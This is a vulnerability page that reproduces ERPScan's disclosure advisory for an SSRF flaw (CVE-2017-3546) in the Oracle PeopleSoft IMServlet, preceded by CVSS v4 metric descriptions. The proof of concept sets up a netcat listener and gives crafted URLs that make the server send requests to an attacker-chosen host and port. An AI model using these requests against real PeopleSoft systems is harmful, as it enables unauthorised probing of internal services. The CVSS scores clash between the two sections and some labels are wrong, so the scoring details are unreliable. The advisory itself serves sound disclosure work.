The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Attack Requirements
Present
AT
The successful attack depends on the presence of specific deployment and execution conditions of the vulnerable system that enable the attack. These include: A race condition must be won to successfully exploit the vulnerability. The successfulness of the attack is conditioned on execution conditions that are not under full control of the attacker. The attack may need to be launched multiple times against a single target before being successful. Network injection. The attacker must inject themselves into the logical network path between the target and the resource requested by the victim (e.g. vulnerabilities requiring an on-path attacker).
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Confidentiality Impact to the Vulnerable System
High
VC
There is a total loss of confidentiality, resulting in all information within the Vulnerable System being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.
Availability Impact to the Vulnerable System
High
VI
There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the Vulnerable System. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the Vulnerable System.
Availability Impact to the Vulnerable System
High
VA
There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the Vulnerable System; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the Vulnerable System (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).
Subsequent System Confidentiality Impact
Negligible
SC
There is no loss of confidentiality within the Subsequent System or all confidentiality impact is constrained to the Vulnerable System.
Integrity Impact to the Subsequent System
None
SI
There is no loss of integrity within the Subsequent System or all integrity impact is constrained to the Vulnerable System.
Availability Impact to the Subsequent System
None
SA
There is no loss of availibility within the Subsequent System or all availibility impact is constrained to the Vulnerable System.
Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRFApplication: Oracle PeopleSoft
Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55;
PeopleSoft HCM 9.2
Vendor URL: http://oracle.com
Bugs: SSRF
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Roman Shalymov (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-022] SSRF in PeopleSoft IMServlet
Advisory ID: [ERPSCAN-17-022]
Risk: high
CVE: CVE-2017-3546
Advisory URL: https://erpscan.com/advisories/erpscan-17-022-ssrf-peoplesoft-imservlet/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
An attacker can force a vulnerable server to trigger malicious
requests to third-party servers or to internal resources. This
vulnerability can then be leveraged to launch specific attacks such as
a cross-site port attack, service enumeration, and various other
attacks.
4. VULNERABLE PACKAGES
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Roman Shalymov
7. TECHNICAL DESCRIPTION
PoC
Run netcat
1. nc -l -p # on some host
In browser open the following links
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
Read response in netcat
GET /?param=var HTTP/1.1
User-Agent: Java1.7.0_95
Host: SOMEHOST:OPEN_PORT
Accept: text/html, image/gif, image/jpeg, /; q=.2
Connection: Keep-Alive
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
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trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
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Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
aEmerging Vendora in Security by CRN, listed among aTOP 100 SAP
Solution providersa and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScanas primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We afollow the suna and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
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Twitter: @erpscan
Scoop-it: Business Application Security